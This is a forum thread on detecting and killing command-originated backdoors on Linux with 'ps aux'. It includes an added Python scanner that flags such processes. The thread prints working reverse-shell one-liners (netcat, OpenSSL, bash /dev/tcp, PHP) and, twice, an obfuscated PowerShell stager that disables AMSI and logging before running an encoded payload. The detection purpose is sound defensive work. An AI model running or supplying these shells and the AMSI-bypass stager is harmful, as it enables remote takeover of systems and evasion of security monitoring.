Discussion: How to find and remove a backdoor on Linux without an AV

Status
Thread closed to further replies.

Netcat

Jade User
17 January 2022
This technique works on backdoors that originate from a command. Linux is powerful and offers the ability to carry out complex operations, among them the possibility of creating TCP relays with a single command. This kind of backdoor, netcat among them, can nevertheless be discovered easily with the "ps aux" command.

This command shows a verbose output of the table of active processes, showing specifically whether they originate from a command. The technique does not work with more advanced payloads, such as Beacon or Meterpreter, since those originate from an infected file and not from a command. For those you need to identify the source the shell originates from and remove it.

Examples of typical backdoors that can be detected (and killed) on Unix with "ps aux" followed by kill "process PID". These backdoors are used against newbies, since whoever manages to find them obtains information about the IP and the port used by the listener:
mkfifo /tmp/zphmduw; nc 127.0.0.1 443 0</tmp/zphmduw | /bin/sh >/tmp/zphmduw 2>&1; rm /tmp/zphmduw (this is Netcat);
sh -c '(sleep 4319|openssl s_client -quiet -connect 127.0.0.1:443|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 127.0.0.1:443 >/dev/null 2>&1 &)' (reverse shell via OpenSSL);
bash -c '0<&118-;exec 118<>/dev/tcp/127.0.0.1/443;sh <&118 >&118 2>&118' (bash command)
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://127.0.0.1:443",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'& (php command shell)

This trick, i.e. generating a backdoor from a command, is also possible on Windows, through PowerShell. Small detail: Microsoft does not like the autonomous user, it insists on doing everything for you. If the command evades AMSI it can take you a long time to find the infected process, especially if the malware creates fake copies of svchost.exe in the second stage of the infection, a well-known multi-instance process.
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $tSIE=((''Enable{''+''0}cri{2}t{''+''1}lo''+''ck{3}oggin''+''g''+'''')-f''S'',''B'',''p'',''L'');If($PSVersionTable.PSVersion.Major -ge 3){ $f26j=((''Sc{''+''1}ipt{2''+''}loc''+''{0''+''}Logging'')-f''k'',''r'',''B''); $eFTdc=[Ref].Assembly.GetType(((''''+''S{2}stem.''+''{0}''+''ana{5}ement.{1}''+''{4}t''+''omation''+''.''+''Uti{3}s'')-f''M'',''A'',''y'',''l'',''u'',''g'')); $fThX=[Ref].Assembly.GetType(((''{5''+''}''+''{''+''6}s''+''tem.''+''{2''+''}''+''{9}n''+''{9''+''}{1}e''+''men''+''t.''+''{7}{''+''3}''+''t{8''+''}m''+''{9}ti{8}''+''n.{7''+''}msi{0''+''}ti{4}s''+'''')-f''U'',''g'',''M'',''u'',''l'',''S'',''y'',''A'',''o'',''a'')); $qyZ=[Collections.Generic.Dictionary[string,System.Object]]::new(); $qh1d=((''{4}na{0''+''}leS''+''c{2}iptBlock''+''{3}n{5''+''}o''+''cation''+''{1}''+''ogging'')-f''b'',''L'',''r'',''I'',''E'',''v''); if ($fThX) { $fThX.GetField(((''''+''amsiI{3''+''}i{''+''0}{4''+''}ai''+''{2}{''+''1}''+''d''+'''')-f''t'',''e'',''l'',''n'',''F''),''NonPublic,Static'').SetValue($null,$true); }; $qtyQ1=$eFTdc.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($qtyQ1) { $fnp=$qtyQ1.GetValue($null); $qyZ.Add($tSIE,0); $qyZ.Add($qh1d,0); $fnp[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$f26j]=$qyZ; If($fnp[$f26j]){ $fnp[$f26j][$tSIE]=0; $fnp[$f26j][$qh1d]=0; } } Else { [Ref].Assembly.GetType(((''S''+''{0}stem.{5}anagement''+''.A''+''{''+''2''+''}tomation.S''+''c{4}i{3}t{''+''1''+''}lock'')-f''y'',''B'',''u'',''p'',''r'',''M'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAAO252MCA7VYaW+jSBr+PtL8B2sUKY42nXDYmclII62xOYwNNkcVRzZaYapijuIIYBuYnf++hRN39+x0z/auNHy''+''BKt6rnv{1}5i3p''+''5OeRhExf56PVhLo1+/f670fu1DaogG42viuPt6Kr/C{1}c3n95{1}hX''+''kx+mU''+''0fpqV5aLIgjh//vnn+aGqcN68je9k3MzqGmc7EuN6fDP618iJcIU/bHYJDpvRr6Orf97JpNgF5F2s''+''mw{1}hhEcfZjka3q2LMBjiurNKEjfj63/84/rm6QP7fCe+HgJSj6+trm5w{1}ocIub4Z/XYzOLS7Eo+vtTisirp4ae6cOOe5O5DXwQvWqbUj1nATFai+pmv5tJoKN4cqPy9qsPImM76mj''+''9uqCGcIVbiur29HT4P9p+fnv4+f3p2bh7yJM3y3zBtcFaWFq2Mc4vpOCXJEsIlfnqmW1VRxvn++uaFixyLF46v8QMjt''+''6H8xM9bx6QL{1}tyqNP1eiUtumurmlCf3jMrUCHQh+U7z+QpyUAzf0uvCAgvfbgN/LhTo7Dy{1}foM6nicv1{1}H6DacDjbVHHZ+VfRsztSKO+g6aoOjq8sqsDvnn+CPfoKmpvv9UWe1GkavmWTOjUEy''+''xi9PzJwO9yf5W7P4mD0N''+''eZvMAvcY4XXR5kcXgh6/hLGcEvBJ8RubuI6TTC8fX7C4wWmOB90AwgD8T4g5qYxc1HXeEQE4SrWUizWtOoaMJvfh/MW''+''97G18tcwxkF721MmXr1QksEX6Tfy6K''+''7eB/GVOh6ToK6vh1tD7RGw9uRhQOC0e1oltfx+6vZoSnOj9efwtUOpInDoG4u5p5v/gPO{1}7fzIq+b6hDStFII''+''bKvEYRyQAZHbkRIjLHRWvL+4v/4iHvOAEFo71NKR5oPODDhYzUCWikZKiXFzZ+FmmZUEZ1TivGNIJNjT/eG9Ps7cCvYYXX8lzEs{1}vJF+wOUCyG{1}B0mRbpGhuRzCuGrr/DBgP9Po/YvjjvnMOZl7h99SML/X1JHTNUABX+/kq''+''Hjj6DtAZjqqhUEhVkQlBjR8mb5vM+I{1}7MV5Mt4viNKOXKJkGFCwA/aWGVGItG8sT4zWIomXMLv''+''{1}03AFxv22Y''+''cmXbimotlFm1aKOX2bJeiorQGawwC5X4R6gKAFC9eL42knY5Q/P1frmnDoRlFAqMz+wFRpqvLSESY2a2twzFmLD+8v''+''4nIsS9tbRmivPR/ke74mSiuK090zV1FkkbJLGc{1}NZPB30/l{1}cL8TwOh7Hh1WIsUj+i5Bkwwg4sBUeUfAOW''+''y/3fTnsDru8nUiTQ+WXcrkt4Ty+WXR724uxyWUtOnxl0LMoPmtcco/t7eLifswXxh''+''cNrAI8+f8+CeNHO9z8J+Wm13x73yHB+NFu923HFzAGyyh3vYSg/8r6r9oEM6918SrAM9mtnegznswZ1QhE4Zu''+''o7k/PcLkvpHZ6WsjoNZakPu1msxtEu5PQucAXGy9qjxzVok5RJmMEIyaBYiVOCOnbrUUp5vLEHPOmRDJt1SrZrojOD3A6qxHNMEsbRxnfDxubUV9/RmaWkT0PeJDtrqtr{1}{1}LHj2BOV70OOHHfxVMEZOQHe7HxHalbzP9XVfYc9hjmxkTL4Yoq11NjY1RnfYQ4G93hAGeyQxDxsUp/iw849Vy{1}6Yg7y5S4Li9V8n1sLs7eAJNj9ktXyun0BuqBD33Gk8Oil0wIk6VSPawb30q''+''MtqTJwWGD0kRMq+kIH6o+awh4o3lvDUTXIS5ottzykvN65amvzZmpwjaWBZhJkOljzfgRSmEE52oZMCYFi9sECEUfeMzpfn15Ay''+''FqMZOIcWlB'
'+''Bc91V57asMU5etCZMOXOhtYhpA58PK''+''wPoB''+''gLTZiMib8WYDxYwc931U5MrjlD001BUTS3fV9CFsaMQAlz/FSRkAqDEIADyVYeOkC2G+6sP{1}ei5qAcpzWJGTxPEtzye8i{1}tH2xFJyYH6ecG0BwDBjkis1MEFlLfPixNX24zExCKF/HUrs5hQh6ALa0D2etDnixALk0g9F1HCZm{1}w3Y2Lyx9fl9RBrJGWiaaWJ88rnzVs6YCttcbqcYbrO56TGSZjs8juVwbaTMFmW5qVlipvM4ZQDJWjHek26wHWWMSOuEU9lGCe+FRZwUGAjTHTs35rvCKEsQBptwiybcxUB8AJ/a2aLRoTm1xWuW4fkzzQAymtQKF5sBVXzXXh2F2as3MO+O0443hvtV4Ic{1}SNA+Z1rUIf''+''A3T5jXsqJ1e4yx''+''+OTFS5GCZNUzG9AA3Ya0+mkCFBCvuM{1}O5xxVOC27{1}G9zAJZAvK8Br7caq+ZAzWcvWeA1GLeTQxufVE3ZNBS0E{1}beQ3J0ibSFbHpGColCUZLggh52y5BBZUq4bbZATBnEG45851EyAC1Naf4xpm5''+''s155+womsGD/kg208Mjm''+''HCril0kcY6xLEQ/OGuw8gzHVak2L{1}QPPVWikQ/gRsfFiwgBa+lMAkS/6AzSIKsGq1ZSfWhsLDFokWJHgE+ygIeRgCotsfve40xpr7MHvXus{1}Y''+''WphU6Rr{1}LxC6QygebM3nPmfaaM83X/OwUUP4DntaeE3WOnR7XjHjSmIilnlyQSFsrR5HGqK3BoX431KgLM62PMjrfwEQiIJk{1}N7ZeY2nWeYnXogWEXmpOjETtfZE0HoemIYC9nbW5BvVGU0xXl30w8MVMxYkjl6zv6qo/f5TPWLAlPWn6cyuLkpBIHBRV{1}gOgimSN38nGBKWmD9Jybs0fGyjCiiLFO1Bvfam0''+''{1}xJRaZVoKPU9KyVKIKmxThlp52S16n3JTmgtyOEUZ+JpB0zfywfO0XOtzHSWFK3t3txsFMgGGTwGiQ4cSa8cq67gwvfChW9iF2oe1AGWvImlCFtrAY4wLztayxXFvwW5HkG59XZMubAXsAsVoR/qUnPVKMweoa''+''U''+''Y5zFIAYcot8xEau3UFzXHH/YySHOeW1DQ{1}M48ha7InXUpAh4vVp7tH+w3/BPHiSozg2xoowiLPglY5AQLqFmwLExl2''+''EfhfMWj3GSkxkzMlc2xtaa''+''EFU5DDmWti7pGAQvfR04U0EV6Gq9uIB9Zeq+uh7wEiVBZSsloUsgiWzpBut/Z8qMFpYjRSARMImx2vS7a{1}M8Nc6T6mZ8FeS''+''RaCSpAr0om49vhwphgJRKCTBKgKwgUx6GOCye{1}royhVhyvQwkBaxZ1tqTz''+''WEQBBO1GWwj''+''mxg1PFMPekkppwMBw2sDKpW2ooNQWp0EgRYkDCkaTI8{1}kTr3Zm2tbVntIR1pe9loSGWuexIj3H3aJwSMRcV5KOuorgQv0ANyU7j3G1MigQWOge3b76iy8o0PMZcjuuUCBRycXDnqiQwwibwN9bi{1}73EYpmx0Mp6ENpitejTcS9a8gNmR0wQBivrLYTOXSfD1Hutql5cpKa4f902/u78cpe/RlOHzvRfrNPe5coaO10VM75Zqcv+lgx8CDP98PtuPZ7J''+''{1}ffqAHwicQ5w3PPV+lFLL90DR9/93V3vrsVPi1flALqjoKCD0t0k7vcmaXikp67962RTxojMfnHwAprnJMaN''+''{1}M++rLYX{1}GSBEOreO5z6Nt61szOfS2YHmO6ktPN6OPgjefesrL1M8/+zRKenwezrZ3a5zvm+iWaXmGo{1}0g0zKT80n529c2L8pufDZ2O/STFJqLbXK2Tc3FL6Px+K9Ha1sVDW1fvo7X16CjvlPab9D2560LGAAUioJ8Dt
95XR+58Dl2FDSWLvx''+''p+FvwRhJq4AN+HV01Qzv9eXt+RXbeX0uc92Ymojf034jzae5P3n4TmZjbAZ4/TP5+4rMu8C8EwAnihkpatCcj+O0vwZ{1}xeK+VzzJMk0ML4eX9Gn6cbQ7NB/1AyLkt/DfJpg5msBMAAA{0}{0}'')-f''='',''d'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"

Without dwelling too long on Windows PowerShell, let's go back to the commands given at the start: if you come across strange OpenSSL instances, or even Netcat, in your process table, it means someone has managed to complete an exploitation attempt successfully on your device and has obtained a shell. If that happens, take the OS offline and try to understand a bit how they did it (maybe you are using outdated software?)

Output of "ps aux" on Ubuntu 20.04

Attachments

  • ps-aux.jpg
    258.7 KB · Views: 11
Last edited:
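An added example, not part of the original post, that automates the "ps aux" check described above: it parses ps aux output, flags command lines shaped like the four command-originated shells listed in the post (netcat, openssl s_client, bash /dev/tcp, php -r opening a socket), and pulls out the listener IP and port that, as the post notes, anyone who finds such a process obtains. The ps aux sample is constructed (it is not the screenshot from the post), and the indicator labels and function names are my own.

```python
"""Scan `ps aux` output for command-line reverse shells.

Added example for the thread above; the ps aux sample below is constructed,
not taken from the original post's screenshot.
"""
import re
import subprocess
from typing import Dict, List, Optional, Tuple

# Constructed `ps aux` sample: a few benign processes plus one instance of each
# shell shape from the post (ps shows the command without the shell quoting).
SAMPLE_PS_AUX = """\
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.1 168940 11920 ?        Ss   09:00   0:01 /sbin/init
www-data    1203  0.0  0.2 213456 18772 ?        S    09:02   0:00 nc 127.0.0.1 443
www-data    1204  0.0  0.0   2608   592 ?        S    09:02   0:00 /bin/sh
alice       2310  0.0  0.1  12244  5300 pts/0    S    09:10   0:00 sh -c (sleep 4319|openssl s_client -quiet -connect 127.0.0.1:443|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 127.0.0.1:443 >/dev/null 2>&1 &)
alice       2311  0.0  0.1  12244  5300 pts/0    S    09:10   0:00 openssl s_client -quiet -connect 127.0.0.1:443
bob         2400  0.0  0.1  12244  5300 ?        S    09:11   0:00 bash -c 0<&118-;exec 118<>/dev/tcp/127.0.0.1/443;sh <&118 >&118 2>&118
bob         2401  0.3  0.5  98760 41220 ?        S    09:11   0:00 php -r $ctxt=stream_context_create(["ssl"=>["verify_peer"=>false]]);while($s=@stream_socket_client("ssl://127.0.0.1:443",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);}}
alice       2500  0.0  0.1  12244  5300 pts/1    S+   09:12   0:00 openssl s_server -accept 8443 -cert server.pem
alice       2501  0.0  0.1   8000  3000 pts/1    S+   09:12   0:00 grep --color=auto openssl
"""

# Indicators (label, regex); a command line gets the label of the first hit.
# Labels are my own names, not any tool's taxonomy.
INDICATORS = [
    ("bash-dev-tcp", re.compile(r"/dev/(?:tcp|udp)/")),
    ("openssl-s_client", re.compile(r"\bopenssl\s+s_client\b")),
    ("netcat", re.compile(r"\b(?:nc|ncat|netcat)\b")),
    ("php-socket", re.compile(r"\bphp\b.*\b(?:stream_socket_client|fsockopen)\s*\(")),
    ("mkfifo-relay", re.compile(r"\bmkfifo\b")),
]

# Where each shape names its listener: (host, port) capture groups.
ENDPOINT_PATTERNS = [
    re.compile(r"-connect\s+([\w.\-]+):(\d+)"),                      # openssl s_client
    re.compile(r"/dev/(?:tcp|udp)/([\w.\-]+)/(\d+)"),                # bash
    re.compile(r"(?:ssl|tls|tcp|udp)://([\w.\-]+):(\d+)"),           # php stream wrapper
    re.compile(r"\b(?:nc|ncat|netcat)\b(?:\s+-\S+)*\s+([\w.\-]+)\s+(\d+)\b"),  # nc [flags] host port
]


def parse_ps_aux(text: str) -> List[Dict]:
    """Turn `ps aux` text into dicts with user, pid and the full command line.
    ps aux has 10 fixed columns; everything after them is the command."""
    procs = []
    for line in text.splitlines():
        parts = line.split(None, 10)
        if len(parts) < 11 or not parts[1].isdigit():
            continue  # header line or a truncated row
        procs.append({"user": parts[0], "pid": int(parts[1]), "command": parts[10]})
    return procs


def listener_endpoint(command: str) -> Optional[Tuple[str, int]]:
    """Extract the (host, port) the shell connects back to, if visible."""
    for pat in ENDPOINT_PATTERNS:
        m = pat.search(command)
        if m:
            return m.group(1), int(m.group(2))
    return None


def find_command_backdoors(ps_text: str) -> List[Dict]:
    """Return the processes whose command line looks like a command-originated shell."""
    findings = []
    for proc in parse_ps_aux(ps_text):
        cmd = proc["command"]
        if cmd.startswith("grep "):
            continue  # a manual `ps aux | grep nc` would otherwise flag itself
        for label, pat in INDICATORS:
            if pat.search(cmd):
                findings.append({**proc, "kind": label, "remote": listener_endpoint(cmd)})
                break
    return findings


def scan_live_system() -> List[Dict]:
    """Run the check against the real process table (Linux/Unix only)."""
    out = subprocess.run(["ps", "auxww"], capture_output=True, text=True, check=True).stdout
    return find_command_backdoors(out)


if __name__ == "__main__":
    for f in find_command_backdoors(SAMPLE_PS_AUX):
        print(f"PID {f['pid']:>6} user={f['user']:<9} kind={f['kind']:<17} "
              f"listener={f['remote']}  -> candidate for: kill {f['pid']}")
```

Running the file as-is reports the five suspicious rows of the constructed sample (PIDs 1203, 2310, 2311, 2400, 2401), each with the 127.0.0.1:443 listener, and leaves /sbin/init, the bare /bin/sh child, the legitimate `openssl s_server` and the grep row alone; `scan_live_system()` applies the same logic to a real `ps auxww`. As the post says, this only catches shells that live in a command line: an implant started from a dropped binary shows up as an ordinary executable path and has to be traced to its file instead.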
Fix the formatting @Access Denied , it makes your eyes cross, use the BBCODE ["CODE] [/CODE], remove the " after the first bracket.
Something like this:
Bash:
# netcat
mkfifo /tmp/zphmduw; nc 127.0.0.1 443 0</tmp/zphmduw | /bin/sh >/tmp/zphmduw 2>&1; rm /tmp/zphmduw
# Openssl
sh -c '(sleep 4319|openssl s_client -quiet -connect 127.0.0.1:443|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 127.0.0.1:443 >/dev/null 2>&1 &)'
# Bash
bash -c '0<&118-;exec 118<>/dev/tcp/127.0.0.1/443;sh <&118 >&118 2>&118'
# PHP
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://127.0.0.1:443",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
Code:
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c  $tSIE=((''Enable{''+''0}cri{2}t{''+''1}lo''+''ck{3}oggin''+''g''+'''')-f''S'',''B'',''p'',''L'');If($PSVersionTable.PSVersion.Major -ge 3){ $f26j=((''Sc{''+''1}ipt{2''+''}loc''+''{0''+''}Logging'')-f''k'',''r'',''B''); $eFTdc=[Ref].Assembly.GetType(((''''+''S{2}stem.''+''{0}''+''ana{5}ement.{1}''+''{4}t''+''omation''+''.''+''Uti{3}s'')-f''M'',''A'',''y'',''l'',''u'',''g'')); $fThX=[Ref].Assembly.GetType(((''{5''+''}''+''{''+''6}s''+''tem.''+''{2''+''}''+''{9}n''+''{9''+''}{1}e''+''men''+''t.''+''{7}{''+''3}''+''t{8''+''}m''+''{9}ti{8}''+''n.{7''+''}msi{0''+''}ti{4}s''+'''')-f''U'',''g'',''M'',''u'',''l'',''S'',''y'',''A'',''o'',''a'')); $qyZ=[Collections.Generic.Dictionary[string,System.Object]]::new(); $qh1d=((''{4}na{0''+''}leS''+''c{2}iptBlock''+''{3}n{5''+''}o''+''cation''+''{1}''+''ogging'')-f''b'',''L'',''r'',''I'',''E'',''v''); if ($fThX) { $fThX.GetField(((''''+''amsiI{3''+''}i{''+''0}{4''+''}ai''+''{2}{''+''1}''+''d''+'''')-f''t'',''e'',''l'',''n'',''F''),''NonPublic,Static'').SetValue($null,$true); }; $qtyQ1=$eFTdc.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($qtyQ1) { $fnp=$qtyQ1.GetValue($null); $qyZ.Add($tSIE,0); $qyZ.Add($qh1d,0); $fnp[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$f26j]=$qyZ; If($fnp[$f26j]){ $fnp[$f26j][$tSIE]=0; $fnp[$f26j][$qh1d]=0; } } Else { [Ref].Assembly.GetType(((''S''+''{0}stem.{5}anagement''+''.A''+''{''+''2''+''}tomation.S''+''c{4}i{3}t{''+''1''+''}lock'')-f''y'',''B'',''u'',''p'',''r'',''M'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAAO252MCA7VYaW+jSBr+PtL8B2sUKY42nXDYmclII62xOYwNNkcVRzZaYapijuIIYBuYnf++hRN39+x0z/auNHy''+''BKt6rnv{1}5i3p''+''5OeRhExf56PVhLo1+/f670fu1DaogG42viuPt6Kr/C{1}c3n95{1}hX''+''kx+mU''+''0fpqV5aLIgjh//vnn+aGqcN68je9k3MzqGmc7EuN6fDP618iJcIU/bHYJDpvRr6Orf97JpNgF5F2s''+''mw{1}hhEcfZjka3q2LMBjiurNKEjfj63/84/rm6QP7fCe+HgJSj6+trm5w{1}ocIub4Z/XYzOLS7Eo+vtTisirp4ae6cOOe5O5DXwQvWqbUj1nATFai+pmv5tJoKN4cqPy9qsPImM76mj''+''9uqCGcIVbiur29HT4P9p+fnv4+f3p2bh7yJM3y3zBtcFaWFq2Mc4vpOCXJEsIlfnqmW1VRxvn++uaFixyLF46v8QMjt''+''6H8xM9bx6QL{1}tyqNP1eiUtumurmlCf3jMrUCHQh+U7z+QpyUAzf0uvCAgvfbgN/LhTo7Dy{1}foM6nicv1{1}H6DacDjbVHHZ+VfRsztSKO+g6aoOjq8sqsDvnn+CPfoKmpvv9UWe1GkavmWTOjUEy''+''xi9PzJwO9yf5W7P4mD0N''+''eZvMAvcY4XXR5kcXgh6/hLGcEvBJ8RubuI6TTC8fX7C4wWmOB90AwgD8T4g5qYxc1HXeEQE4SrWUizWtOoaMJvfh/MW''+''97G18tcwxkF721MmXr1QksEX6Tfy6K''+''7eB/GVOh6ToK6vh1tD7RGw9uRhQOC0e1oltfx+6vZoSnOj9efwtUOpInDoG4u5p5v/gPO{1}7fzIq+b6hDStFII''+''bKvEYRyQAZHbkRIjLHRWvL+4v/4iHvOAEFo71NKR5oPODDhYzUCWikZKiXFzZ+FmmZUEZ1TivGNIJNjT/eG9Ps7cCvYYXX8lzEs{1}vJF+wOUCyG{1}B0mRbpGhuRzCuGrr/DBgP9Po/YvjjvnMOZl7h99SML/X1JHTNUABX+/kq''+''Hjj6DtAZjqqhUEhVkQlBjR8mb5vM+I{1}7MV5Mt4viNKOXKJkGFCwA/aWGVGItG8sT4zWIomXMLv''+''{1}03AFxv22Y''+''cmXbimotlFm1aKOX2bJeiorQGawwC5X4R6gKAFC9eL42knY5Q/P1frmnDoRlFAqMz+wFRpqvLSESY2a2twzFmLD+8v''+''4nIsS9tbRmivPR/ke74mSiuK090zV1FkkbJLGc{1}NZPB30/l{1}cL8TwOh7Hh1WIsUj+i5Bkwwg4sBUeUfAOW''+''y/3fTnsDru8nUiTQ+WXcrkt4Ty+WXR724uxyWUtOnxl0LMoPmtcco/t7eLifswXxh''+''cNrAI8+f8+CeNHO9z8J+Wm13x73yHB+NFu923HFzAGyyh3vYSg/8r6r9oEM6918SrAM9mtnegznswZ1QhE4Zu''+''o7k/PcLkvpHZ6WsjoNZakPu1msxtEu5PQucAXGy9qjxzVok5RJmMEIyaBYiVOCOnbrUUp5vLEHPOmRDJt1SrZrojOD3A6qxHNMEsbRxnfDxubUV9/RmaWkT0PeJDtrqtr{1}{1}LHj2BOV70OOHHfxVMEZOQHe7HxHalbzP9XVfYc9hjmxkTL4Yoq11NjY1RnfYQ4G93hAGeyQxDxsUp/iw849Vy{1}6Yg7y5S4Li9V8n1sLs7eAJNj9ktXyun0BuqBD33Gk8Oil0wIk6VSPawb30q''+''MtqTJwWGD0kRMq+kIH6o+awh4o3lvDUTXIS5ottzykvN65amvzZmpwjaWBZhJkOljzfgRSmEE52oZMCYFi9sECEUfeMzpfn15Ay''+''FqMZOIcWlB'
'+''Bc91V57asMU5etCZMOXOhtYhpA58PK''+''wPoB''+''gLTZiMib8WYDxYwc931U5MrjlD001BUTS3fV9CFsaMQAlz/FSRkAqDEIADyVYeOkC2G+6sP{1}ei5qAcpzWJGTxPEtzye8i{1}tH2xFJyYH6ecG0BwDBjkis1MEFlLfPixNX24zExCKF/HUrs5hQh6ALa0D2etDnixALk0g9F1HCZm{1}w3Y2Lyx9fl9RBrJGWiaaWJ88rnzVs6YCttcbqcYbrO56TGSZjs8juVwbaTMFmW5qVlipvM4ZQDJWjHek26wHWWMSOuEU9lGCe+FRZwUGAjTHTs35rvCKEsQBptwiybcxUB8AJ/a2aLRoTm1xWuW4fkzzQAymtQKF5sBVXzXXh2F2as3MO+O0443hvtV4Ic{1}SNA+Z1rUIf''+''A3T5jXsqJ1e4yx''+''+OTFS5GCZNUzG9AA3Ya0+mkCFBCvuM{1}O5xxVOC27{1}G9zAJZAvK8Br7caq+ZAzWcvWeA1GLeTQxufVE3ZNBS0E{1}beQ3J0ibSFbHpGColCUZLggh52y5BBZUq4bbZATBnEG45851EyAC1Naf4xpm5''+''s155+womsGD/kg208Mjm''+''HCril0kcY6xLEQ/OGuw8gzHVak2L{1}QPPVWikQ/gRsfFiwgBa+lMAkS/6AzSIKsGq1ZSfWhsLDFokWJHgE+ygIeRgCotsfve40xpr7MHvXus{1}Y''+''WphU6Rr{1}LxC6QygebM3nPmfaaM83X/OwUUP4DntaeE3WOnR7XjHjSmIilnlyQSFsrR5HGqK3BoX431KgLM62PMjrfwEQiIJk{1}N7ZeY2nWeYnXogWEXmpOjETtfZE0HoemIYC9nbW5BvVGU0xXl30w8MVMxYkjl6zv6qo/f5TPWLAlPWn6cyuLkpBIHBRV{1}gOgimSN38nGBKWmD9Jybs0fGyjCiiLFO1Bvfam0''+''{1}xJRaZVoKPU9KyVKIKmxThlp52S16n3JTmgtyOEUZ+JpB0zfywfO0XOtzHSWFK3t3txsFMgGGTwGiQ4cSa8cq67gwvfChW9iF2oe1AGWvImlCFtrAY4wLztayxXFvwW5HkG59XZMubAXsAsVoR/qUnPVKMweoa''+''U''+''Y5zFIAYcot8xEau3UFzXHH/YySHOeW1DQ{1}M48ha7InXUpAh4vVp7tH+w3/BPHiSozg2xoowiLPglY5AQLqFmwLExl2''+''EfhfMWj3GSkxkzMlc2xtaa''+''EFU5DDmWti7pGAQvfR04U0EV6Gq9uIB9Zeq+uh7wEiVBZSsloUsgiWzpBut/Z8qMFpYjRSARMImx2vS7a{1}M8Nc6T6mZ8FeS''+''RaCSpAr0om49vhwphgJRKCTBKgKwgUx6GOCye{1}royhVhyvQwkBaxZ1tqTz''+''WEQBBO1GWwj''+''mxg1PFMPekkppwMBw2sDKpW2ooNQWp0EgRYkDCkaTI8{1}kTr3Zm2tbVntIR1pe9loSGWuexIj3H3aJwSMRcV5KOuorgQv0ANyU7j3G1MigQWOge3b76iy8o0PMZcjuuUCBRycXDnqiQwwibwN9bi{1}73EYpmx0Mp6ENpitejTcS9a8gNmR0wQBivrLYTOXSfD1Hutql5cpKa4f902/u78cpe/RlOHzvRfrNPe5coaO10VM75Zqcv+lgx8CDP98PtuPZ7J''+''{1}ffqAHwicQ5w3PPV+lFLL90DR9/93V3vrsVPi1flALqjoKCD0t0k7vcmaXikp67962RTxojMfnHwAprnJMaN''+''{1}M++rLYX{1}GSBEOreO5z6Nt61szOfS2YHmO6ktPN6OPgjefesrL1M8/+zRKenwezrZ3a5zvm+iWaXmGo{1}0g0zKT80n529c2L8pufDZ2O/STFJqLbXK2Tc3FL6Px+K9Ha1sVDW1fvo7X16CjvlPab9D2560LGAAUioJ8Dt
95XR+58Dl2FDSWLvx''+''p+FvwRhJq4AN+HV01Qzv9eXt+RXbeX0uc92Ymojf034jzae5P3n4TmZjbAZ4/TP5+4rMu8C8EwAnihkpatCcj+O0vwZ{1}xeK+VzzJMk0ML4eX9Gn6cbQ7NB/1AyLkt/DfJpg5msBMAAA{0}{0}'')-f''='',''d'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
 